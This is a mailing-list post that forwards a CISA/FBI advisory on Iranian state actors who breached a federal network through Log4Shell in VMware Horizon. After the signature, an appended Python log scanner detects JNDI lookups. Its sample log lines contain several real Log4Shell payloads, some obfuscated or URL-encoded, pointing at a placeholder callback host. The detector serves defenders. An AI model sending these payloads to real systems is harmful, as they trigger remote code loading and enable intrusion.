[CDP-development] CISA and FBI Release Advisory on Iranian Government-Sponsored APT Actors Compromise Federal Network
Masse, Theresa
theresa.masse at cisa.dhs.gov
Wed Nov 16 07:19:31 PST 2022
FYSA
The Cybersecurity and Infrastructure Security Agency (CISA) and Federal Bureau of Investigation (FBI) published a joint Cybersecurity Advisory (CSA) about suspected Iranian government-sponsored actors that compromised a federal civilian executive branch (FCEB) agency. The advisory, "Iranian Government-Sponsored APT Actors Compromise Federal Network, Deploy Crypto Miner, Credential Harvester<https://www.cisa.gov/uscert/ncas/alerts/aa22-320a>" provides information on their tactics, techniques, and procedures (TTPs) and indicators of compromise (IOCs) to help network defenders detect and protect against related compromises.
During an incident response at a federal agency, CISA determined the advanced persistent threat (APT) actors had exploited the Log4Shell vulnerability (CVE-2021-44228) in an unpatched VMware Horizon server on the agency's network for initial access. With that access, the Iranian APT actors installed software and proxies that enabled them to move laterally, compromise credentials, and maintain persistence. The activity was first detected during routine, retrospective analysis using EINSTEIN, an FCEB-wide intrusion detection system (IDS) operated and monitored by CISA.
Organizations that detect suspected initial access or compromise based on the advisory's IOCs or TTPs are advised to assume the threat actors have already moved laterally, and to investigate connected systems and the domain controller (DC).
Recommended mitigations include installing updated builds so that affected VMware Horizon and Unified Access Gateway systems run the latest version; keeping all software up to date and prioritizing patching of known exploited vulnerabilities; and following identity and access management (IAM) best practices by implementing multifactor authentication (MFA) and enforcing the use of strong passwords.
In addition to applying mitigations, CISA and FBI recommend exercising, testing, and validating your organization's security program against the threat behaviors mapped to the MITRE ATT&CK for Enterprise framework in the advisory. Network defenders should test their existing security controls inventory to assess how it performs against the ATT&CK techniques the advisory describes.
Theresa A. Masse
Cybersecurity State Coordinator/Advisor, Region 10 (Oregon)
Cybersecurity and Infrastructure Security Agency
Department of Homeland Security
Phone: (503) 930-5671
Email: theresa.masse at cisa.dhs.gov<mailto:theresa.masse at cisa.dhs.gov>
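The advisory summarized above attributes initial access to Log4Shell against an unpatched VMware Horizon server. A first practical check for defenders is to scan web access logs for the JNDI lookup string that a Log4Shell attempt must carry, including the obfuscated forms attackers use to slip past naive string matching. The scanner below is an added example written for this post; it is not code from CISA, the FBI, or the advisory. It assumes Apache-style access-log lines (constructed here, with 198.51.100.23 as a documentation-range callback address; real Horizon or Unified Access Gateway logs may be formatted differently), and it resolves only the common nested-lookup tricks (${lower:x}, ${upper:x}, and any lookup with a default value such as ${::-x} or ${env:NOPE:-x}) plus URL-encoding.

```python
import re
import urllib.parse

# Constructed Apache-style access-log lines for this example (not real traffic;
# the callback host 198.51.100.23 is a documentation address). Lines 1 and 6 are
# benign; lines 2-5 carry a JNDI lookup in increasingly obfuscated forms.
SAMPLE_LOG_LINES = [
    '10.0.0.5 - - [15/Nov/2022:10:01:02 +0000] "GET /portal/ HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [15/Nov/2022:10:01:07 +0000] "GET /portal/ HTTP/1.1" 200 512 "-" "${jndi:ldap://198.51.100.23:1389/a}"',
    '10.0.0.9 - - [15/Nov/2022:10:01:09 +0000] "GET /portal/ HTTP/1.1" 200 512 "-" "${${lower:j}ndi:${lower:r}mi://198.51.100.23:1099/o}"',
    '10.0.0.9 - - [15/Nov/2022:10:01:11 +0000] "GET /portal/ HTTP/1.1" 200 512 "-" "${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://198.51.100.23:1389/b}"',
    '10.0.0.9 - - [15/Nov/2022:10:01:13 +0000] "GET /portal/?q=%24%7Bjndi%3Aldap%3A%2F%2F198.51.100.23%3A1389%2Fc%7D HTTP/1.1" 404 0 "-" "curl/7.79"',
    '10.0.0.7 - - [15/Nov/2022:10:02:00 +0000] "GET /static/jndi-docs.html HTTP/1.1" 200 2048 "-" "Mozilla/5.0"',
]

# Nested lookups that Log4j resolves to plain text before it ever sees "jndi":
# ${lower:j} / ${upper:j}, and any lookup with an empty or unknown key plus a
# default value, e.g. ${::-j}, ${env:NOPE:-j}, ${sys:x:-j}.
_CASE_LOOKUP = re.compile(r"\$\{(?:lower|upper):([^${}]*)\}", re.IGNORECASE)
_DEFAULT_LOOKUP = re.compile(r"\$\{[^${}]*:-([^${}]*)\}")
# What is left after de-obfuscation if the line carried a Log4Shell payload.
_JNDI_LOOKUP = re.compile(
    r"\$\{jndi:(ldaps?|rmi|dns|iiop|corba|nds|https?)://([^}\s]*)", re.IGNORECASE
)


def normalize(line: str, max_rounds: int = 10) -> str:
    """Repeatedly URL-decode and resolve nested lookups until the text stops
    changing (handles double encoding and nesting). Log4j matches lookup keys
    case-insensitively, so text pulled out of a lookup is lower-cased."""
    text = line
    for _ in range(max_rounds):
        resolved = urllib.parse.unquote(text)
        resolved = _CASE_LOOKUP.sub(lambda m: m.group(1).lower(), resolved)
        resolved = _DEFAULT_LOOKUP.sub(lambda m: m.group(1), resolved)
        if resolved == text:
            break
        text = resolved
    return text


def find_log4shell(lines):
    """Return (1-based line number, normalized callback URL) for every line that
    still contains a ${jndi:...} lookup after de-obfuscation."""
    hits = []
    for number, line in enumerate(lines, start=1):
        match = _JNDI_LOOKUP.search(normalize(line))
        if match:
            hits.append((number, f"{match.group(1).lower()}://{match.group(2)}"))
    return hits


if __name__ == "__main__":
    for number, target in find_log4shell(SAMPLE_LOG_LINES):
        print(f"line {number}: JNDI lookup pointing at {target}")
```

A hit shows that a Log4Shell probe reached the server, not that it succeeded. Corroborate with outbound LDAP/RMI connections from the Horizon host to the extracted callback target and, per the advisory's guidance, treat a confirmed hit as a reason to assume lateral movement and examine connected systems and the domain controller rather than only the web tier.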